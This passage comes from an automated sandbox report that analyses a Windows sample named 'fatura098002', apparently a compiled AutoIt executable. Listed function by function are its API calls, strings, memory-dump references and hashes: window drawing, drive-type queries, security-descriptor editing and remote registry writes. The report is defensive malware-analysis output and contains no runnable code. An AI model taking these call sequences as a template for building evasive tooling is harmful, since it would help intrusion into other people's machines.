CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00782964
GetStockObject.GDI32(00000011), ref: 00782974
SelectObject.GDI32(00000000,00000000), ref: 00782978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00782988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00782991
DeleteDC.GDI32(00000000), ref: 0078299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007829C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 007829DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00782A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00782A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00782A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00782A77
GetStockObject.GDI32(00000011), ref: 00782A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00782A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00782A97

Strings

AutoIt v3, xrefs: 007828F8
DISPLAY, xrefs: 0078295A
msctls_progress32, xrefs: 00782A13
static, xrefs: 0078294F, 00782A71

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: afb81ad3bd4ca083b4c117563c2fea88728db1661eae7d25aaabd76aa5fb1e72
Instruction ID: 832600789a0975322ede65570ea71c65c5f9dd17dd9df425e40f551ce601c11f
Opcode Fuzzy Hash: afb81ad3bd4ca083b4c117563c2fea88728db1661eae7d25aaabd76aa5fb1e72
Instruction Fuzzy Hash: 70B15BB1A40205BFEB14DFA8DC49EAE7BB9EB08711F008115FA15E72D1D778AD41CBA4

Function 00774ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00774AED
GetDriveTypeW.KERNEL32(?,0079CB68,?,\\.\,0079CC08), ref: 00774BCA
SetErrorMode.KERNEL32(00000000,0079CB68,?,\\.\,0079CC08), ref: 00774D36

Strings

Fixed, xrefs: 00774C09
SATA, xrefs: 00774CD0
Virtual, xrefs: 00774CE5
PhysicalDrive, xrefs: 00774B76
iSCSI, xrefs: 00774CC2
FileBackedVirtual, xrefs: 00774CEC
SSD, xrefs: 00774C4A
Fibre, xrefs: 00774CAD
Unknown, xrefs: 00774BED, 00774C83
SSA, xrefs: 00774CA6
Removable, xrefs: 00774C10, 00774C15
SAS, xrefs: 00774CC9
USB, xrefs: 00774CB4
\\.\, xrefs: 00774B3F
SCSI, xrefs: 00774C8A
MMC, xrefs: 00774CDE
RAMDisk, xrefs: 00774BF4
ATAPI, xrefs: 00774C91
Network, xrefs: 00774C02
ATA, xrefs: 00774C98
RAID, xrefs: 00774CBB
CDROM, xrefs: 00774BFB
1394, xrefs: 00774C9F

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 866809610300914af423292b806e49ca9219637eb821f47bc75f1324b9dfd02d
Instruction ID: 09d7111138d36ef658c7258f6089b370be6a6a9d6f2c87a2a59a1ade79b7f7b7
Opcode Fuzzy Hash: 866809610300914af423292b806e49ca9219637eb821f47bc75f1324b9dfd02d
Instruction Fuzzy Hash: 7261ADB1705105DBCF15DB28CAD6E69B7F0AB04380B24C52DE80AAB692DB3DED41DB61

Function 00718D85 Relevance: 40.7, APIs: 22, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00718E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00756AC5
6F550200.COMCTL32(?,000000FF,?), ref: 00756AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00756F43

Part of subcall function 00718F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00718BE8,?,00000000,?,?,?,?,00718BBA,00000000,?), ref: 00718FC5

SendMessageW.USER32(?,00001053), ref: 00756F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00756F96

Strings

0, xrefs: 00756DCF

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessageSend$Window$DestroyF550200InvalidateMoveRect
String ID: 0
API String ID: 268457297-4108050209
Opcode ID: e1c9e46a47394e0047ab696072fa383ac8e7700f5853f4d226a94a96a7f2ee39
Instruction ID: 893f710157cf98e5a606125bff6b5704404e39c6e1d6f860f1e4c991e740cabe
Opcode Fuzzy Hash: e1c9e46a47394e0047ab696072fa383ac8e7700f5853f4d226a94a96a7f2ee39
Instruction Fuzzy Hash: 2C12C170601241EFDB25CF28C854BE5B7F1FB45302F948469F8858B2A1CB79EC9ACB91

Function 007973E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00797421
SetTextColor.GDI32(?,?), ref: 00797425
GetSysColorBrush.USER32(0000000F), ref: 0079743B
GetSysColor.USER32(0000000F), ref: 00797446
CreateSolidBrush.GDI32(?), ref: 0079744B
GetSysColor.USER32(00000011), ref: 00797463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00797471
SelectObject.GDI32(?,00000000), ref: 00797482
SetBkColor.GDI32(?,00000000), ref: 0079748B
SelectObject.GDI32(?,?), ref: 00797498
InflateRect.USER32(?,000000FF,000000FF), ref: 007974B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007974CE
GetWindowLongW.USER32(00000000,000000F0), ref: 007974DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0079752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00797554
InflateRect.USER32(?,000000FD,000000FD), ref: 00797572
DrawFocusRect.USER32(?,?), ref: 0079757D
GetSysColor.USER32(00000011), ref: 0079758E
SetTextColor.GDI32(?,00000000), ref: 00797596
DrawTextW.USER32(?,007970F5,000000FF,?,00000000), ref: 007975A8
SelectObject.GDI32(?,?), ref: 007975BF
DeleteObject.GDI32(?), ref: 007975CA
SelectObject.GDI32(?,?), ref: 007975D0
DeleteObject.GDI32(?), ref: 007975D5
SetTextColor.GDI32(?,?), ref: 007975DB
SetBkColor.GDI32(?,?), ref: 007975E5

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 675569c4e844af4feb98f4d6968e82eda6217eeaffc7041443c21cabb32b7e1f
Instruction ID: 00cdc8b9b4dd8f046598eed0571f9d0f134e503b87fe9abfbd410973840a4b12
Opcode Fuzzy Hash: 675569c4e844af4feb98f4d6968e82eda6217eeaffc7041443c21cabb32b7e1f
Instruction Fuzzy Hash: 98616D72900218AFDF059FA4DC49EEEBFB9EB08320F118116F915AB2A1D7789951CF94

Function 00790FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00791128
GetDesktopWindow.USER32 ref: 0079113D
GetWindowRect.USER32(00000000), ref: 00791144
GetWindowLongW.USER32(?,000000F0), ref: 00791199
DestroyWindow.USER32(?), ref: 007911B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007911ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0079120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0079121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00791232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00791245
IsWindowVisible.USER32(00000000), ref: 007912A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 007912BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 007912D0
GetWindowRect.USER32(00000000,?), ref: 007912E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0079130E
GetMonitorInfoW.USER32(00000000,?), ref: 00791328
CopyRect.USER32(?,?), ref: 0079133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 007913AA

Strings

tooltips_class32, xrefs: 007911E6
(, xrefs: 0079131B
0, xrefs: 007910D3

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: f522aaf083fdc1a20efcd8398b3756c172c2dbd93e92cb9b57163789f144628d
Instruction ID: b411a68145557f0fb3aa6d5eb1e26dd316678a9da65abf54db09ce1437ba62a5
Opcode Fuzzy Hash: f522aaf083fdc1a20efcd8398b3756c172c2dbd93e92cb9b57163789f144628d
Instruction Fuzzy Hash: FFB19D71604341EFDB00DF64D888B6ABBE4FF88350F408919F9999B2A1CB75E855CB92

Function 00790241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007902E5
_wcslen.LIBCMT ref: 0079031F
_wcslen.LIBCMT ref: 00790389
_wcslen.LIBCMT ref: 007903F1
_wcslen.LIBCMT ref: 00790475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007904C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00790504

Part of subcall function 0071F9F2: _wcslen.LIBCMT ref: 0071F9FD

Part of subcall function 0076223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00762258
Part of subcall function 0076223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0076228A

Strings

GETSELECTEDCOUNT, xrefs: 00790470, 0079048B
GETSELECTED, xrefs: 007905E1
SELECTALL, xrefs: 00790515
FINDITEM, xrefs: 00790627
VIEWCHANGE, xrefs: 00790675
DESELECT, xrefs: 0079059C
ISSELECTED, xrefs: 007904DD
SELECTINVERT, xrefs: 0079057E
SELECT, xrefs: 00790548
SELECTCLEAR, xrefs: 0079052D
GETITEMCOUNT, xrefs: 00790316, 00790337
GETTEXT, xrefs: 007903EC, 00790407
GETSUBITEMCOUNT, xrefs: 00790384, 0079039F

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 0b6b9e48009c198e0075d15b1057945ace1a2d1f680c6dfab4222dc00c00767e
Instruction ID: a2e0f307302b5f6fb1255b00180d06909838b4c2a5d395878edb3e09db30cb7a
Opcode Fuzzy Hash: 0b6b9e48009c198e0075d15b1057945ace1a2d1f680c6dfab4222dc00c00767e
Instruction Fuzzy Hash: E0E1B031218201CFCB14DF24D95592AB7E6BFC8714F144A6CF8969B3A1DB38ED45CB91

Function 00718891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00718968
GetSystemMetrics.USER32(00000007), ref: 00718970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0071899B
GetSystemMetrics.USER32(00000008), ref: 007189A3
GetSystemMetrics.USER32(00000004), ref: 007189C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007189E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 007189F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00718A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00718A3C
GetClientRect.USER32(00000000,000000FF), ref: 00718A5A
GetStockObject.GDI32(00000011), ref: 00718A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00718A81

Part of subcall function 0071912D: GetCursorPos.USER32(?), ref: 00719141
Part of subcall function 0071912D: ScreenToClient.USER32(00000000,?), ref: 0071915E
Part of subcall function 0071912D: GetAsyncKeyState.USER32(00000001), ref: 00719183
Part of subcall function 0071912D: GetAsyncKeyState.USER32(00000002), ref: 0071919D

SetTimer.USER32(00000000,00000000,00000028,007190FC), ref: 00718AA8

Strings

AutoIt v3 GUI, xrefs: 00718A20

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: b1b73d856a47fe94864ed9b3e381761731a948e887772572c144302f400baedf
Instruction ID: 0019bf22b2e6ba8e09dcba57f74bd0a5c1511495fb56c1680de606944484b61b
Opcode Fuzzy Hash: b1b73d856a47fe94864ed9b3e381761731a948e887772572c144302f400baedf
Instruction Fuzzy Hash: 1CB18D71A00209AFDF14DFA8CC55BEA3BB4FB08315F51822AFA15A72D0DB78E841CB55

Function 00760D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007610F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00761114
Part of subcall function 007610F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 00761120
Part of subcall function 007610F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00760B9B,?,?,?), ref: 0076112F
Part of subcall function 007610F9: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00761136
Part of subcall function 007610F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0076114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00760DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00760E29
GetLengthSid.ADVAPI32(?), ref: 00760E40
GetAce.ADVAPI32(?,00000000,?), ref: 00760E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00760E96
GetLengthSid.ADVAPI32(?), ref: 00760EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00760EB5
RtlAllocateHeap.NTDLL(00000000), ref: 00760EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00760EDD
CopySid.ADVAPI32(00000000), ref: 00760EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00760F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00760F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00760F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00760F6E
HeapFree.KERNEL32(00000000), ref: 00760F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00760F7E
HeapFree.KERNEL32(00000000), ref: 00760F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00760F8E
HeapFree.KERNEL32(00000000), ref: 00760F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00760FA1
HeapFree.KERNEL32(00000000), ref: 00760FA8

Part of subcall function 00761193: GetProcessHeap.KERNEL32(00000008,00760BB1,?,00000000,?,00760BB1,?), ref: 007611A1
Part of subcall function 00761193: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 007611A8
Part of subcall function 00761193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00760BB1,?), ref: 007611B7

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocateDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4042927181-0
Opcode ID: b678c2c8c457473178ad3fba9cf49cdb00805e8d67545fe8161086398eba9c28
Instruction ID: a8ed7d7ee560da03fd4de36791fac73efb8c462931dc84e36e290de7d85e7617
Opcode Fuzzy Hash: b678c2c8c457473178ad3fba9cf49cdb00805e8d67545fe8161086398eba9c28
Instruction Fuzzy Hash: 95715E7190021AEBDF219FA4DC49BEFBBB8BF05300F048115F91AA6251D7799A05CBA0

Function 0078C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0078C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0079CC08,00000000,?,00000000,?,?), ref: 0078C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0078C5A4
_wcslen.LIBCMT ref: 0078C5F4
_wcslen.LIBCMT ref: 0078C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0078C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0078C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0078C84D
RegCloseKey.ADVAPI32(?), ref: 0078C881
RegCloseKey.ADVAPI32(00000000), ref: 0078C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0078C960

Strings

REG_QWORD, xrefs: 0078C8C3
REG_SZ, xrefs: 0078C644
REG_EXPAND_SZ, xrefs: 0078C5CD
REG_BINARY, xrefs: 0078C913
REG_MULTI_SZ, xrefs: 0078C6F5
REG_DWORD, xrefs: 0078C804

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 0f022bd32f979f18ed687b34b71373c7875a07b40d00869b146e938a68c58e03
Instruction ID: a410a64c5e5ec4b4fcbeb9dd438b271d479c536bba6b2c636029723bf0f6a943
Opcode Fuzzy Hash: 0f022bd32f979f18ed687b34b71373c7875a07b40d00869b146e938a68c58e03
Instruction Fuzzy Hash: 33127931604201DFDB15EF14C895A2AB7E5EF88714F14899CF88A9B3A2DB39FD41CB91

Function 0079091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007909C6
_wcslen.LIBCMT ref: 00790A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00790A54
_wcslen.LIBCMT ref: 00790A8A
_wcslen.LIBCMT ref: 00790B06
_wcslen.LIBCMT ref: 00790B81

Part of subcall function 0071F9F2: _wcslen.LIBCMT ref: 0071F9FD

Part of subcall function 00762BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00762BFA

Strings

UNCHECK, xrefs: 00790D3E
GETSELECTED, xrefs: 00790C4E
EXPAND, xrefs: 00790BF8
COLLAPSE, xrefs: 00790B01, 00790B1C
GETTOTALCOUNT, xrefs: 007909F2, 00790A17
SELECT, xrefs: 00790D11
EXISTS, xrefs: 00790B7C, 00790B97
ISCHECKED, xrefs: 00790CE1
GETITEMCOUNT, xrefs: 00790C1E
CHECK, xrefs: 00790A85, 00790AA0
GETTEXT, xrefs: 00790C97

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
